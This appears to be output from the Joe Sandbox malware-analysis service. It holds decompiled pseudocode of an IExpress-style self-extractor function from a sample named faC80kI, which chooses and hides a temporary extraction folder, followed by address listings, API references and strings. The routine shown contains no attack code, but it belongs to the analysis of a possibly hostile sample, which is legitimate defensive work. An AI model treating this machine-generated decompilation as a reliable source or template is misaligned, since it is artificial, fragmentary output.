                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E00A9468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E00A9468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0xa99a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0xa98b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0xa98a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00A96517(_t82, 0x7d2, 0, E00A93210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa99a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0xa991e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0xa991e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00A91781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00A96952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E00A9597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00A92630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E00A9658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0xa991e4;
                                                                                                                                                                                                                                            																					E00A91781(0xa991e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00A95467(0xa991e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00A92630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E00A9597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00A95467(0xa991e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0xa991e4;
                                                                                                                                                                                                                                            											_t70 = E00A92630(0, 0xa991e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0xa991e4;
                                                                                                                                                                                                                                            												_t71 = E00A95467(0xa991e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E00A9597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa98b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00A95467(0xa98b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E00A944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00A96CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a955ab
                                                                                                                                                                                                                                            0x00a955b2
                                                                                                                                                                                                                                            0x00a955c9
                                                                                                                                                                                                                                            0x00a955d5
                                                                                                                                                                                                                                            0x00a955d9
                                                                                                                                                                                                                                            0x00a95600
                                                                                                                                                                                                                                            0x00a95605
                                                                                                                                                                                                                                            0x00a9560a
                                                                                                                                                                                                                                            0x00a9560c
                                                                                                                                                                                                                                            0x00a95638
                                                                                                                                                                                                                                            0x00a95641
                                                                                                                                                                                                                                            0x00a95643
                                                                                                                                                                                                                                            0x00a95645
                                                                                                                                                                                                                                            0x00a95645
                                                                                                                                                                                                                                            0x00a9564c
                                                                                                                                                                                                                                            0x00a95652
                                                                                                                                                                                                                                            0x00a95657
                                                                                                                                                                                                                                            0x00a95659
                                                                                                                                                                                                                                            0x00a95696
                                                                                                                                                                                                                                            0x00a9569c
                                                                                                                                                                                                                                            0x00a9589f
                                                                                                                                                                                                                                            0x00a958a7
                                                                                                                                                                                                                                            0x00a958ac
                                                                                                                                                                                                                                            0x00a958b3
                                                                                                                                                                                                                                            0x00a958b5
                                                                                                                                                                                                                                            0x00a956a2
                                                                                                                                                                                                                                            0x00a956a2
                                                                                                                                                                                                                                            0x00a956a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a956ae
                                                                                                                                                                                                                                            0x00a956ae
                                                                                                                                                                                                                                            0x00a956b9
                                                                                                                                                                                                                                            0x00a956bf
                                                                                                                                                                                                                                            0x00a956c1
                                                                                                                                                                                                                                            0x00a956f3
                                                                                                                                                                                                                                            0x00a956f3
                                                                                                                                                                                                                                            0x00a95705
                                                                                                                                                                                                                                            0x00a9570a
                                                                                                                                                                                                                                            0x00a95711
                                                                                                                                                                                                                                            0x00a95717
                                                                                                                                                                                                                                            0x00a95724
                                                                                                                                                                                                                                            0x00a95726
                                                                                                                                                                                                                                            0x00a95729
                                                                                                                                                                                                                                            0x00a95730
                                                                                                                                                                                                                                            0x00a95737
                                                                                                                                                                                                                                            0x00a9573d
                                                                                                                                                                                                                                            0x00a95740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9572b
                                                                                                                                                                                                                                            0x00a9572b
                                                                                                                                                                                                                                            0x00a9572e
                                                                                                                                                                                                                                            0x00a95742
                                                                                                                                                                                                                                            0x00a95742
                                                                                                                                                                                                                                            0x00a95745
                                                                                                                                                                                                                                            0x00a9576b
                                                                                                                                                                                                                                            0x00a9576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95747
                                                                                                                                                                                                                                            0x00a95747
                                                                                                                                                                                                                                            0x00a9574d
                                                                                                                                                                                                                                            0x00a9574f
                                                                                                                                                                                                                                            0x00a95771
                                                                                                                                                                                                                                            0x00a95771
                                                                                                                                                                                                                                            0x00a95773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95751
                                                                                                                                                                                                                                            0x00a95751
                                                                                                                                                                                                                                            0x00a95753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95755
                                                                                                                                                                                                                                            0x00a9575b
                                                                                                                                                                                                                                            0x00a95760
                                                                                                                                                                                                                                            0x00a95762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95764
                                                                                                                                                                                                                                            0x00a95764
                                                                                                                                                                                                                                            0x00a95769
                                                                                                                                                                                                                                            0x00a9577e
                                                                                                                                                                                                                                            0x00a9577e
                                                                                                                                                                                                                                            0x00a95781
                                                                                                                                                                                                                                            0x00a95788
                                                                                                                                                                                                                                            0x00a9578d
                                                                                                                                                                                                                                            0x00a9578f
                                                                                                                                                                                                                                            0x00a957b2
                                                                                                                                                                                                                                            0x00a957b8
                                                                                                                                                                                                                                            0x00a957bd
                                                                                                                                                                                                                                            0x00a957bf
                                                                                                                                                                                                                                            0x00a957cd
                                                                                                                                                                                                                                            0x00a957cd
                                                                                                                                                                                                                                            0x00a957dd
                                                                                                                                                                                                                                            0x00a957e3
                                                                                                                                                                                                                                            0x00a957ef
                                                                                                                                                                                                                                            0x00a957f5
                                                                                                                                                                                                                                            0x00a957f8
                                                                                                                                                                                                                                            0x00a9580a
                                                                                                                                                                                                                                            0x00a9580a
                                                                                                                                                                                                                                            0x00a957fa
                                                                                                                                                                                                                                            0x00a95802
                                                                                                                                                                                                                                            0x00a95802
                                                                                                                                                                                                                                            0x00a9580d
                                                                                                                                                                                                                                            0x00a9580f
                                                                                                                                                                                                                                            0x00a95830
                                                                                                                                                                                                                                            0x00a95836
                                                                                                                                                                                                                                            0x00a9583d
                                                                                                                                                                                                                                            0x00a9584b
                                                                                                                                                                                                                                            0x00a95851
                                                                                                                                                                                                                                            0x00a95855
                                                                                                                                                                                                                                            0x00a9585a
                                                                                                                                                                                                                                            0x00a9585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9585e
                                                                                                                                                                                                                                            0x00a9585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9585e
                                                                                                                                                                                                                                            0x00a95811
                                                                                                                                                                                                                                            0x00a95817
                                                                                                                                                                                                                                            0x00a95819
                                                                                                                                                                                                                                            0x00a9581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9581f
                                                                                                                                                                                                                                            0x00a95791
                                                                                                                                                                                                                                            0x00a95797
                                                                                                                                                                                                                                            0x00a9579c
                                                                                                                                                                                                                                            0x00a9579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a957a0
                                                                                                                                                                                                                                            0x00a957a9
                                                                                                                                                                                                                                            0x00a957ae
                                                                                                                                                                                                                                            0x00a957b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a957b0
                                                                                                                                                                                                                                            0x00a9579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95769
                                                                                                                                                                                                                                            0x00a95762
                                                                                                                                                                                                                                            0x00a95753
                                                                                                                                                                                                                                            0x00a9574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95864
                                                                                                                                                                                                                                            0x00a95864
                                                                                                                                                                                                                                            0x00a95864
                                                                                                                                                                                                                                            0x00a95717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a956c3
                                                                                                                                                                                                                                            0x00a956c5
                                                                                                                                                                                                                                            0x00a956c9
                                                                                                                                                                                                                                            0x00a956ce
                                                                                                                                                                                                                                            0x00a956d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a956d6
                                                                                                                                                                                                                                            0x00a956d6
                                                                                                                                                                                                                                            0x00a956d8
                                                                                                                                                                                                                                            0x00a956dd
                                                                                                                                                                                                                                            0x00a956df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a956e1
                                                                                                                                                                                                                                            0x00a956e2
                                                                                                                                                                                                                                            0x00a956e4
                                                                                                                                                                                                                                            0x00a956e6
                                                                                                                                                                                                                                            0x00a956eb
                                                                                                                                                                                                                                            0x00a956ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a956f3
                                                                                                                                                                                                                                            0x00a956f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9586c
                                                                                                                                                                                                                                            0x00a95878
                                                                                                                                                                                                                                            0x00a9587e
                                                                                                                                                                                                                                            0x00a95882
                                                                                                                                                                                                                                            0x00a95883
                                                                                                                                                                                                                                            0x00a95889
                                                                                                                                                                                                                                            0x00a9588e
                                                                                                                                                                                                                                            0x00a9588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95896
                                                                                                                                                                                                                                            0x00a956ed
                                                                                                                                                                                                                                            0x00a956df
                                                                                                                                                                                                                                            0x00a956d0
                                                                                                                                                                                                                                            0x00a956c1
                                                                                                                                                                                                                                            0x00a956a8
                                                                                                                                                                                                                                            0x00a9565b
                                                                                                                                                                                                                                            0x00a9565b
                                                                                                                                                                                                                                            0x00a9565d
                                                                                                                                                                                                                                            0x00a95669
                                                                                                                                                                                                                                            0x00a95669
                                                                                                                                                                                                                                            0x00a9565f
                                                                                                                                                                                                                                            0x00a9565f
                                                                                                                                                                                                                                            0x00a95665
                                                                                                                                                                                                                                            0x00a95667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95667
                                                                                                                                                                                                                                            0x00a9566c
                                                                                                                                                                                                                                            0x00a95673
                                                                                                                                                                                                                                            0x00a95678
                                                                                                                                                                                                                                            0x00a9567a
                                                                                                                                                                                                                                            0x00a9589b
                                                                                                                                                                                                                                            0x00a9589b
                                                                                                                                                                                                                                            0x00a95680
                                                                                                                                                                                                                                            0x00a95685
                                                                                                                                                                                                                                            0x00a9568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9568c
                                                                                                                                                                                                                                            0x00a9567a
                                                                                                                                                                                                                                            0x00a9560e
                                                                                                                                                                                                                                            0x00a95613
                                                                                                                                                                                                                                            0x00a9561a
                                                                                                                                                                                                                                            0x00a95620
                                                                                                                                                                                                                                            0x00a95626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95626
                                                                                                                                                                                                                                            0x00a955db
                                                                                                                                                                                                                                            0x00a955e0
                                                                                                                                                                                                                                            0x00a955e7
                                                                                                                                                                                                                                            0x00a955f1
                                                                                                                                                                                                                                            0x00a955f6
                                                                                                                                                                                                                                            0x00a955f6
                                                                                                                                                                                                                                            0x00a955f6
                                                                                                                                                                                                                                            0x00a958b7
                                                                                                                                                                                                                                            0x00a958c7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A955CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A95638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A9564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A95620
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A956B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A9571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A95737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A957CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A957EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A95802
                                                                                                                                                                                                                                              • Part of subcall function 00A92630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A92654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A95830
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A95878
                                                                                                                                                                                                                                              • Part of subcall function 00A9597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A959A8
                                                                                                                                                                                                                                              • Part of subcall function 00A9597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A959AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-2610921595
                                                                                                                                                                                                                                            • Opcode ID: a9264913478bbe3dbcb9747236043eb6e2a520708d4d4e11be30e2fdc6907caa
